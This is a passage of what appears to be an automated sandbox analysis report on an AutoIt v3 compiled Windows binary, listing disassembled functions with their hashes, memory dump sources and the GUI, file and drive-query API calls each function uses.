                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7184279784806f06c67ea01a1fc258e16321b5f7fa322a5c13a0a85e70551294
                                                                                      • Instruction ID: e44d7eefcba407515c2434a493a258d1f61a5c3d9e2f578758de0499de92dbc4
                                                                                      • Opcode Fuzzy Hash: 7184279784806f06c67ea01a1fc258e16321b5f7fa322a5c13a0a85e70551294
                                                                                      • Instruction Fuzzy Hash: 2422F470A04609DFDF04CF65D891AEEB3F5FF45300F204229E816A72A1EB359E95EB54
                                                                                      Function 00C191C0 Relevance: .5, Instructions: 475COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6eeea7111f3793c54db2642996c1dbbb3823111ab7ee3a6387ea8d291e4887d7
                                                                                      • Instruction ID: 05a39719ba85eb05b98ed9cbcb165f4f2bc05c520f3a78dcd83d55e0ccdc46a1
                                                                                      • Opcode Fuzzy Hash: 6eeea7111f3793c54db2642996c1dbbb3823111ab7ee3a6387ea8d291e4887d7
                                                                                      • Instruction Fuzzy Hash: 5102E7B5E00209EBDB04DF64D881AAEB7B5FF44300F118169E816DB290EB31EF95DB95
                                                                                      Function 00C31C77 Relevance: .3, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction ID: 43338182a2d6a5f3ff183443a6a9bd893b949779adc219cc9a276c837356eab1
                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction Fuzzy Hash: BC9179721280A34EDB6A463E857407EFFE15A523A1B1E079DDCF2CA1C5FE14CA54D620
                                                                                      Function 00C319B0 Relevance: .2, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction ID: a9b82f9d75931e5631de39726bbb90f50f40b317f2a3a9231650aeba284e67ad
                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction Fuzzy Hash: 129187722190E34EDB2D427A857403DFFE15A923A6B1E079DD8F2CA1C1FD14C764E620
                                                                                      Function 00C37A4A Relevance: .2, Instructions: 237COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e0e6c0761db7c23f07272b0b7a30dd4369b62ae0542d33859df5373bfe1e60d
                                                                                      • Instruction ID: 643904d3a0b8dded7f6f7d9b4c675b06ab938f8e7f3d3393e007c86f766faf78
                                                                                      • Opcode Fuzzy Hash: 3e0e6c0761db7c23f07272b0b7a30dd4369b62ae0542d33859df5373bfe1e60d
                                                                                      • Instruction Fuzzy Hash: 88618AF1238309A7DE349A2C8CA5BBEB3A4DF41708F101B1AF853DB281D6119F46E755
                                                                                      Function 00C37CA7 Relevance: .2, Instructions: 237COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f00483d1692421cf4d7de9aaa8fe928b5afb94107b427faf4014b85e0458c3f8
                                                                                      • Instruction ID: 20783a467cc73c73d66115a0ac3fb730ac9ed82e1e303e1df077d8fc2d714c0e
                                                                                      • Opcode Fuzzy Hash: f00483d1692421cf4d7de9aaa8fe928b5afb94107b427faf4014b85e0458c3f8
                                                                                      • Instruction Fuzzy Hash: 57617AF12387096BDE389A288896BFF2398DF41700F100B59F863DB281DA129F469355
                                                                                      Function 00C31706 Relevance: .2, Instructions: 232COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction ID: fdd2b72d5224a755e2735ab1c4006bdc2c01ad347278ae12fdfbef849f14083a
                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction Fuzzy Hash: 988187336191A34DDB6D863A853453EFFE15A923A1B1E079DD8F2CB1C1EE24C754E620
                                                                                      Function 00C82046 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5550a333b2ee5a4d0324193588281bbc428a8f87a40c879ae749dc54e17023df
                                                                                      • Instruction ID: 4896f08b01dbe2ad31923af2ea2efadf89ec975c4f780b72df6a0269d898cbea
                                                                                      • Opcode Fuzzy Hash: 5550a333b2ee5a4d0324193588281bbc428a8f87a40c879ae749dc54e17023df
                                                                                      • Instruction Fuzzy Hash: 7821E7326206118BDB28CF79C82377E73E9A794314F14862EE4A7C73D0DE75A904CB84
                                                                                      Function 00C92ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 00C92B30
                                                                                      • DeleteObject.GDI32(00000000), ref: 00C92B43
                                                                                      • DestroyWindow.USER32 ref: 00C92B52
                                                                                      • GetDesktopWindow.USER32 ref: 00C92B6D
                                                                                      • GetWindowRect.USER32(00000000), ref: 00C92B74
                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C92CA3
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C92CB1
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92CF8
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00C92D04
                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C92D40
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92D62
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92D75
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92D80
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00C92D89
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92D98
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00C92DA1
                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92DA8
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00C92DB3
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92DC5
                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CAFC38,00000000), ref: 00C92DDB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00C92DEB
                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C92E11
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C92E30
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92E52
                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9303F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                      • API String ID: 2211948467-2373415609
                                                                                      • Opcode ID: 6d607390641683a0ce40343edc66ff78a358d93fc7321751818443f9a491bd32
                                                                                      • Instruction ID: 10dcbc83a2aa7fb9b659812adb289d66c99a7221f211a1db8fe5f5c058258945
                                                                                      • Opcode Fuzzy Hash: 6d607390641683a0ce40343edc66ff78a358d93fc7321751818443f9a491bd32
                                                                                      • Instruction Fuzzy Hash: 05027A71A00215AFDB14DFA4CC89FAE7BB9EB4A314F048158F915AB2A1DB74ED41CF60
                                                                                      Function 00CA70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00CA712F
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00CA7160
                                                                                      • GetSysColor.USER32(0000000F), ref: 00CA716C
                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00CA7186
                                                                                      • SelectObject.GDI32(?,?), ref: 00CA7195
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00CA71C0
                                                                                      • GetSysColor.USER32(00000010), ref: 00CA71C8
                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00CA71CF
                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00CA71DE
                                                                                      • DeleteObject.GDI32(00000000), ref: 00CA71E5
                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00CA7230
                                                                                      • FillRect.USER32(?,?,?), ref: 00CA7262
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA7284
                                                                                        • Part of subcall function 00CA73E8: GetSysColor.USER32(00000012), ref: 00CA7421
                                                                                        • Part of subcall function 00CA73E8: SetTextColor.GDI32(?,?), ref: 00CA7425
                                                                                        • Part of subcall function 00CA73E8: GetSysColorBrush.USER32(0000000F), ref: 00CA743B
                                                                                        • Part of subcall function 00CA73E8: GetSysColor.USER32(0000000F), ref: 00CA7446
                                                                                        • Part of subcall function 00CA73E8: GetSysColor.USER32(00000011), ref: 00CA7463
                                                                                        • Part of subcall function 00CA73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CA7471
                                                                                        • Part of subcall function 00CA73E8: SelectObject.GDI32(?,00000000), ref: 00CA7482
                                                                                        • Part of subcall function 00CA73E8: SetBkColor.GDI32(?,00000000), ref: 00CA748B
                                                                                        • Part of subcall function 00CA73E8: SelectObject.GDI32(?,?), ref: 00CA7498
                                                                                        • Part of subcall function 00CA73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00CA74B7
                                                                                        • Part of subcall function 00CA73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CA74CE
                                                                                        • Part of subcall function 00CA73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00CA74DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                      • String ID:
                                                                                      • API String ID: 4124339563-0
                                                                                      • Opcode ID: 7f47b2f69440e6dea24308d6ebe3dd9b5e72d7a1827e6ff11cb06f2fae33275b
                                                                                      • Instruction ID: 1825546b286a3a670e1151d135764433183956d729aa00566dcbe3a44da242f0
                                                                                      • Opcode Fuzzy Hash: 7f47b2f69440e6dea24308d6ebe3dd9b5e72d7a1827e6ff11cb06f2fae33275b
                                                                                      • Instruction Fuzzy Hash: 70A18D72508302AFDB119F60DC88B6F7BE9FB4A328F100B19FA62971A1D771E9449B51
                                                                                      Function 00C28D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 00C28E14
                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C66AC5
                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C66AFE
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C66F43
                                                                                        • Part of subcall function 00C28F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C28BE8,?,00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C28FC5
                                                                                      • SendMessageW.USER32(?,00001053), ref: 00C66F7F
                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C66F96
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C66FAC
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C66FB7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                      • String ID: 0
                                                                                      • API String ID: 2760611726-4108050209
                                                                                      • Opcode ID: 18cfb282dc00eb57ac06d01982bc30b9e6b85a9065c0ee7caec26a0af51497c3
                                                                                      • Instruction ID: 423f5199a2726ac168f175ca6106aa1df45e47ac56e33e74fddcd6d1c7c6aab7
                                                                                      • Opcode Fuzzy Hash: 18cfb282dc00eb57ac06d01982bc30b9e6b85a9065c0ee7caec26a0af51497c3
                                                                                      • Instruction Fuzzy Hash: D612CB34201251EFDB25CF28D8C4BAAB7E1FB45300F184469F4A58B662CB32ED66DF91
                                                                                      Function 00C92711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000), ref: 00C9273E
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C9286A
                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C928A9
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C928B9
                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C92900
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00C9290C
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C92955
                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C92964
                                                                                      • GetStockObject.GDI32(00000011), ref: 00C92974
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00C92978
                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C92988
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C92991
                                                                                      • DeleteDC.GDI32(00000000), ref: 00C9299A
                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C929C6
                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C929DD
                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C92A1D
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C92A31
                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C92A42
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C92A77
                                                                                      • GetStockObject.GDI32(00000011), ref: 00C92A82
                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C92A8D
                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C92A97
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                      • API String ID: 2910397461-517079104
                                                                                      • Opcode ID: d9fe5674911840252d6cf6cc3ec526857399f12511b5f1b30713aa76edd1fa8d
                                                                                      • Instruction ID: 14286c5f5c91f5e0945c844052df509b28b25d93db7abdbd4c14f05409be830b
                                                                                      • Opcode Fuzzy Hash: d9fe5674911840252d6cf6cc3ec526857399f12511b5f1b30713aa76edd1fa8d
                                                                                      • Instruction Fuzzy Hash: 24B14B71A00215BFEB14DFA8DC89FAE7BB9EB09714F044114FA15EB2A0D774AD40DBA4
                                                                                      Function 00C84ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C84AED
                                                                                      • GetDriveTypeW.KERNEL32(?,00CACB68,?,\\.\,00CACC08), ref: 00C84BCA
                                                                                      • SetErrorMode.KERNEL32(00000000,00CACB68,?,\\.\,00CACC08), ref: 00C84D36
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DriveType
                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                      • API String ID: 2907320926-4222207086
                                                                                      • Opcode ID: 7575b302da5184886cf5d4c71e8b9ade92c63085917ff87d3462bf2734813e5d
                                                                                      • Instruction ID: 3deffb1f39202e7161e36c2d0435b6debddd5299b1dadc7fd2ea00d573e44cad
                                                                                      • Opcode Fuzzy Hash: 7575b302da5184886cf5d4c71e8b9ade92c63085917ff87d3462bf2734813e5d
                                                                                      • Instruction Fuzzy Hash: 9F61B030705207DBCB08FF25CA819BDB7B5AB45308B248426F916AB791DB71EE41EB49
                                                                                      Function 00CA73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000012), ref: 00CA7421
                                                                                      • SetTextColor.GDI32(?,?), ref: 00CA7425
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00CA743B
                                                                                      • GetSysColor.USER32(0000000F), ref: 00CA7446
                                                                                      • CreateSolidBrush.GDI32(?), ref: 00CA744B
                                                                                      • GetSysColor.USER32(00000011), ref: 00CA7463
                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CA7471
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00CA7482
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00CA748B
